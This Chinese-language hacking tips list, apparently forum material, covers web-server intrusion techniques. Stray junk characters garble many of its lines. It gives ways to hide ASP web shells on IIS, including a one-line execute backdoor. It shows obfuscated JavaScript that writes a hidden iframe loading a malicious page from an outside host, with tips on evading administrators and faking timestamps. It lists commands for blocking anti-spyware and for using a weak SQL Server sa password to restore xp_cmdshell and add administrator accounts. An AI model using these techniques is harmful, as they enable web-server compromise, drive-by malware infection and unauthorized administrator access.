" d) }$ M0 q% X7 e4 n3 W9 y1 K @# _& [1 g5 F
53、隐藏ASP后门的两种方法
7 @' K1 n8 J6 [/ i/ G. X1、建立非标准目录:mkdir images..\
% l, F9 O& t( }, j& c& m0 y7 @拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp" D! d$ x1 c' x, C
通过web访问ASP木马:http://ip/images../news.asp?action=login
/ C1 A; x" Z- W6 F" V6 a* u! e如何删除非标准目录:rmdir images..\ /s3 o4 @! t; g, I. v5 G( n8 J& n; o2 G
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:7 V+ s; s _% g+ s9 ~1 ^
mkdir programme.asp
6 L* Z/ O+ N4 [! {* ^! _新建1.txt文件内容:<!--#include file=”12.jpg”-->& @7 ?. y9 ], p: B
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件4 o9 a, F9 W- x5 I
attrib +H +S programme.asp
3 r" o4 f% ~2 v' `通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt$ R3 \9 j9 U8 w0 @
. `5 D! e0 \( C* y4 {& p
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
0 X. d' ?; B2 u然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。, \2 A: m4 B0 Q# u) S
, U! ^3 B0 X F1 y
55、JS隐蔽挂马6 A' b" a2 w& A
1.% B( `" m' ~2 @! [' {
var tr4c3="<iframe src=ht";
$ ?- H, y# E2 r3 D) I3 ytr4c3 = tr4c3+"tp:/";
: F+ x. s: E: y8 y) s# @8 s2 s' o# btr4c3 = tr4c3+"/ww";1 G* @* I( V0 D0 g% H u% h1 T
tr4c3 = tr4c3+"w.tr4";$ f& I& V2 g/ Z$ L! Y
tr4c3 = tr4c3+"c3.com/inc/m";) ?/ ?; B1 y# E/ J% L$ m& B# X2 G9 p
tr4c3 = tr4c3+"m.htm style="display:none"></i";
: e' D* r7 x7 T& B9 V* Ntr4c3 =tr4c3+"frame>'";: Z; L2 F4 X8 U% \4 ]) s7 @
document.write(tr4c3);
4 T- A2 G+ i8 N避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
) r9 V% f; E M/ V# G, X* C ~6 s# F9 g, l) m# |
2.
) K, k9 F! M: m' \4 |& {转换进制,然后用EVAL执行。如
2 E3 t9 H Z1 n/ X* ^* peval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
6 r- C! x4 u( I+ t不过这个有点显眼。
; n; {' J3 I( H0 h3./ e% L( }5 {- [
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');6 U0 z' }- q7 o8 ~( K5 Y
最后一点,别忘了把文件的时间也修改下。
- h0 I; i1 ^2 i' @" p- s, Y" Y
' Y1 N4 ]( u' S( X+ G3 w56.3389终端入侵常用DOS命令) p: @2 k a5 G$ d! z- e# \
taskkill taskkill /PID 1248 /t
: E5 f% f( }9 R7 P) ~0 [3 h
- d7 g* K# }, U& r( q+ ~# ctasklist 查进程$ m$ `2 |, I% w3 X% n" K5 |- W
" }+ r4 g1 p7 v6 g: hcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限8 Y9 q* f0 b8 H3 z6 a$ M+ r
iisreset /reboot
! D, S' A/ i! Atsshutdn /reboot /delay:1 重起服务器6 H8 |9 ^* o s. I0 L9 T3 E2 o
2 U. Q( U; i9 z% Z. hlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,$ A; h. H6 F5 ?) L# X- ~
# O& W8 m% R' i# e; b
query user 查看当前终端用户在线情况: c8 z; Y) C/ n N: G- Y3 [
. j0 \' U) ~8 p' b Y2 \% r要显示有关所有会话使用的进程的信息,请键入:query process *3 o+ b7 w5 O$ s( P
) y$ `0 n% Y' i0 m$ x% W
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2- ?9 A# P0 r: ^. S- j5 B: G$ T/ w. G
1 s4 ?8 b# c, z$ u4 c( s要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
" N5 S O9 w+ y$ i9 d% ~: O! O9 h6 z/ b) I1 ~% x3 F7 P( |
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02. z* j: T; Z* k2 u& `: @1 E! j
& ^( k! C4 p" R$ B3 U
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
% i! o" E \0 s" @; A% F. X
9 p5 ~% ]7 z$ K2 U" r. T命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
6 I+ h( W0 z' |+ @% h; i- k
( `: L3 R8 ?: Q2 U' a V% r4 `命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。+ r# M+ k: Q! j, b+ e" }
* V W: N% n7 Q0 n% F- m命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
+ B+ Q$ x# W; j7 e- T8 g9 c/ E) o( z. ]8 i
56、在地址栏或按Ctrl+O,输入:2 X) Z' i8 m: }
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
4 M/ N: V( g4 D# |9 _; O: M6 r7 g* w6 T
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
/ s- x( T1 V3 _+ [, H/ E" D8 _7 n( X& a- }$ @* K
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,/ z0 j9 }4 r2 g, P7 T9 J
用net localgroup administrators是可以看到管理组下,加了$的用户的。: K8 l9 Z+ H. n4 j# u6 J) n2 X
* j. h7 l7 ~1 ^( P# g( ]* ?# s58、 sa弱口令相关命令' o+ o8 J- [) `
9 I2 v2 z4 `6 b% S, ~一.更改sa口令方法:$ M4 m0 D8 @1 B
用sql综合利用工具连接后,执行命令:' m; }( _# p6 z# R
exec sp_password NULL,'20001001','sa'0 A. }' \/ e2 w+ u; v
(提示:慎用!)& Y9 H/ b3 P0 }' ` o
% ^% U- d7 d" N0 c( f, l1 l
二.简单修补sa弱口令.
' _0 L- _) o* z- ]4 v* g# P! A7 h; @0 W$ i+ E
方法1:查询分离器连接后执行:" W2 Y8 H$ e$ I, r" E: \! i
if exists (select * from
$ a6 K! ?: l8 K' s5 _3 @( ?& p' K: Ydbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* I9 V7 Q3 P) Z2 d/ \6 p& B* WOBJECTPROPERTY(id, N'IsExtendedProc') = 1)- b! F# i# a1 t7 j9 L/ w. w
! i: f# l6 ^8 l g( a! V6 Vexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
5 o' R! g; e4 |$ [3 \7 D
! U) H+ C8 N$ u+ w$ LGO7 c4 I- z" E7 c- e3 o
; T$ s3 L; s8 z& L1 s, T
然后按F5键命令执行完毕0 K1 R- y {# J. I; b2 A% ~! o
- z; v7 M- i# G! M; _4 S: @
方法2:查询分离器连接后/ R1 k& F' ]; ]
第一步执行:use master( M Q) t2 G, h2 j, f! K4 I1 X7 i
第二步执行:sp_dropextendedproc 'xp_cmdshell'6 K+ l1 p6 E' W: `; d( M( W) D
然后按F5键命令执行完毕( L7 M# ?# q- S; s! g
9 C" p! s% Z7 o' x6 \7 D% Y
* g8 I" I! o$ ]" ~7 Z
三.常见情况恢复执行xp_cmdshell.
* H' `% n8 l2 v: }3 P, t7 l2 }
5 i5 r, k& s2 b; u2 B1 B- F+ k- |6 P/ ~1 f$ m
1 未能找到存储过程'master..xpcmdshell'.
9 ~6 `, k& ~5 H* X; {! v( d* L 恢复方法:查询分离器连接后, m8 V# w) l0 q! n) M
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int9 t$ V2 k2 r l9 Y0 j" p4 o
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'" V1 L+ K4 c0 Y4 n
然后按F5键命令执行完毕* u. ~! P1 h* P* X Y- X
) `$ v0 h4 _% e
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
. z w" x% r8 z% v恢复方法:查询分离器连接后,
7 r. [$ n w# r3 p, }9 ~ R5 f第一步执行:sp_dropextendedproc "xp_cmdshell"4 x% |/ a' V% I; A1 _; K4 Y
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
! L5 d4 V, N& s" u k: ~然后按F5键命令执行完毕9 R$ N0 \3 L6 P8 L+ y
# X6 N( M/ e. @, \7 }3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
: n* t |- j! i% n$ @6 n恢复方法:查询分离器连接后,: ^4 H$ l E( |: C
第一步执行:exec sp_dropextendedproc 'xp_cmdshell') W" P, ^2 X% P$ ^3 r
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
- g4 u" ~- x( u4 n2 i1 f5 l- D然后按F5键命令执行完毕
- ]' K( c" J+ S0 f
- `7 z' v! M- V四.终极方法.3 E# P( y& k; S* y
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 J8 r7 F3 R5 V+ A0 R4 ?6 b u查询分离器连接后,
9 |5 Z2 A% ^" q3 ]( M6 j2000servser系统:4 k9 ~. Q M# G% a6 M! f
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
1 U) O3 c) W# b5 u0 Y9 B) P2 Q& h: Y$ \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'# e- D$ G E) u2 S$ j
4 K8 s9 V1 i2 Z* p7 k
xp或2003server系统:7 O8 L/ d: Y1 H+ z* @
9 z. i- R4 c! _) ^! E: g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
( O& y7 O' w- W8 b7 @8 d4 O+ V
" E) c4 m/ e# |: c% ?3 Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add') N3 o) ~4 Z9 P2 ]
|